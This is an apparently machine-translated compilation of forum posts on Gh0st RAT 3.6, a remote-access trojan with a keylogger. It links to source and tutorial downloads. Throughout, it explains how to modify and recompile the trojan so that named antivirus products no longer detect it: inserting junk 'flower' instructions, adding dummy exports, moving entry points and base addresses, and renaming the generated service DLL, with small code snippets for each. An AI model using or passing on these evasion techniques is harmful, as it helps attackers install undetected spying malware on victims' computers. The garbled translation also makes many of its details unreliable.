There are four tutorials available here. Gh0st3.6 compilation tutorial Http://www.3800hk.com/donghua/f/24166.html Vc1_1_6.0no kill tutorial for the gh0stdriver. rar Http://www.heibai.net/download/Soft/Soft_13829.htm Gh0stsource code modified hard disk lock .rar Http://down.hacker.com.cn/soft/20080607/080607gh0st.rar -------------------------------------- The following is a bit of information I have found in some forums. It seems that there is a bit of chaos... -------------------------------------- Gh0st communication sticker Gh0st3.6 has the source code, so we can do Trojan-free killing on the basis of the source code. I personally feel that Kabbah is the best solution. Put a brick first. If you are interested, you can continue or communicate with yourself. Make sure to configure the compiling environment: DDK + SDK + vc6, DDK is used to compile the SYS file, and SDK + vc6 is used to compile the project. For details about why and how to configure it, you can view relevant information on the Internet, you can also view the DDK and SDK help. After the first compilation, Kaba-free killing will be performed first. The Kaspersky file and the dllwill, of course, Kaba will also kill the install.exe of the Community, and finally Kaba will kill the generated Sever. Here I say that the server generated by kill is not a place that overlaps with the previous signature, but a configuration information. Sys kill-free After sys re-compiled, it added the input table function (for unknown reasons, if you are interested, you can compare it with 1) and successfully killed the soft environment through Kabbah, Kingsoft, and red umbrella. SVCHOST. dll kill-free 1. For the call of the multibytetowidechar function, kaback is afraid of flowers. You can add a few invalid statements before this function. 2. the string calls "gh0st Update", which is used for update. If online update is not required, delete the code block where the statement is located, in fact, the search project can replace this string with other strings ^ _ ^. This method can also go through Kingsoft. Who gives us the source code. Server kill-free Kabbah is positioned in the final configuration information. It is obviously not feasible to jump to the configuration information. It adopts the method of adding flowers. before writing aaaaaa configuration information, you can simply write something for server-free killing. Modify the generated DLL Find the % S // % sex string in the source program. This location is where 6to4 is generated. You can change it to anything you want to generate. I just want to talk about it. You can post it here and discuss it together. Have you ever changed the output table (servicemain) of SVCHOST. dll killed by MACOs? To help passers-by improve each other, I added the 3.6 source code attachment. Many people on the Internet did not need to search for them. ^_^ In fact, first modify the Sys File. I have a tutorial on Anti-DDoS. After the tutorial is completed, I killed all the software. I mean to change the base address of the Sys File, DLL and exe files, and then I killed the software over n. After completing these steps, rising also finds and removes DLL files and optimizes the DLL files to add several output tables. kingsoft kills the EXE file and changes the entry point. coffee also killed servicemain of the DLL file and moved servicemain far away. little red umbrella 'nod still kills the input table. These two won't be changed. The servicemain function cannot be annotated. If your Trojan can still run normally before the system is restarted after the annotation is removed, once the service runs in the background, your machine will be vulnerable to the next restart. Servicemain is a key function of SVCHOST. dll. This function has no effect on our gh0st, but can provide support for other services in the system. Is there any way for the sub-system value of the red umbrella to kill the EXE? After testing, the positioning is correct, and all other values outside the sub-system are filled with 0. The red umbrella is used to kill, and the mobile PE Header cannot be removed! A small Method for adding spam code: The Spam code should move the location of the pattern, and do not run to the stack. Such code is useless. You can add a for loop for counting, simple statistics, and local variables without changing the subsequent logic. How to add an output table: If an output table is killed, you can add an empty function to the generated SVCHOST. dll. However, you need to modify the resource once every compilation. In fact, we add the following statement to the source code: Extern "C" _ declspec (dllexport) bool justtempfun (); // Declaration ...... Extern "C" _ declspec (dllexport) bool justtempfun () // implementation { Return false; } After compilation, the output table will be changed, and some will be able to eliminate code. Gh0st honglang Remote Control custom 360 The main reason is why the 6xxx DLL file exists, because the Red wolf cooldiyer has already said. Server generation is random... but it seems that it is not completely random. It is based on the system and garbage. I am not sure about it. Well, OD is loaded. I will check a string for you to see it. Here. [% S/% sex. dll] % s is the so-called random. Here I can tell you exactly 6xxxex. dll 6XX is actually changed from % S. You only need to modify % s to modify the generated DLL. Hey, I changed it to aaex. dll...
(But pay attention to ex. do not modify the DLL ex. because modifying this will cause offline. if you want to make changes, you can launch the service. to connect to the ex. DLL is also modified. this is not demonstrated here)
360. I found it. See. 6to4ex. DLL for a comparison. % Sex. dll % S is changed to 6to4. The gh0st custom 360 source code change method: Install. cpp File Change Wsprintf (strmodulepath, "% S // % sex. dll", strsysdir, lpservicename ); Here Wsprintf (strmodulepath, "% S // % whm. CLC", strsysdir, lpservicename ); That's all. This is actually a mistake of the author. The intention is to randomly select the Service Installation However, this function is not really random. So that every time the service starts from 6to4 A simple solution is to process Add a line of code ..... For (PTR = strsubkey; * PTR; PTR = strchr (PTR, 0) + 1) { If (lstrcmp (PTR, "6to4") = NULL) continue; // Add this line of code // MessageBox (0, PTR, "check what this is during debugging", 0 ); //////////////////////////////////////// ////////////////////////////////// Char temp [500]; ..... In this way, the service is skipped. In addition, the following line of code is the addition of strings. can be changed at will. Wsprintf (strmodulepath, "% S // % sex. dll", strsysdir, PTR ); For example Wsprintf (strmodulepath, "% S // % skill360.dll", strsysdir, PTR ); Or it doesn't matter what the suffix is. Wsprintf (strmodulepath, "% S // % skill360.abc", strsysdir, PTR ); % S // % sex. the first % s of the DLL indicates the path, and the second % s indicates the random file name. You just need to change the second % s to another letter, after the modification, we can go through the 360 and Kingsoft cleanup scanning and killing processes. Tested that the Sys File of gh0st can be used for general purposes from 2.5 to 3.5 ~ Service name: 360tray.exe Enter the last Description: 360 real-time security guard protection module. 360 is behavior detection and removal. How to add flowers in the gh0st source code? _ ASM { Your flower command Your flower command Your flower command Your flower command } The servicemain function is very sensitive. After the annotation is removed, NOD32's rising coffee has passed. Gh0st0 no kill avast latest modification The last two days have not been deprecated, but we have just updated the avast, and then found it again. In fact, we have killed install.exe and SVCHOST. dll (that is, the generated files and the resource files in them), and then we will do its source code-free killing. Solution: 1. The SVCHOST. dll pattern is located in the saveinfo (char * lpbuffer) function in the keyboardmanager. cpp file on the keyboard record. Feature string % 02d/% 02d/% 02d, that is, we can see the date of the keyboard record. There are many ways to modify it, change it to [% d/% d: % d], and compile it to kill the software through avast. 2. the install signature is located in "system/CurrentControlSet/services/% s", and the corresponding file is the installservice function in install. cpp. Modify the case sensitivity and compile it to eliminate it. There is no way to upload the attachment. Check the corresponding code. It is also very easy to modify and compile the two signature files. NOD32 generally finds and removes function export tables (I don't know if it is called this, it is opened with ue, and a bunch of functions can be seen) and locates the name of the function to be killed, generally there will be two or more DLL files where the function is loaded using loadlibrary, and then change the name of the function to call it. You will change the function name, And the rest should not be difficult! The last generated file can pass through nod without shelling Kabbah has a special feature. Its signatures are mainly code-based. Therefore, we do not have to change the original pattern when modifying the pattern. We can also modify the code above the features, you just need to change it a little bit, it will be able to play the effect of adding a flower command. |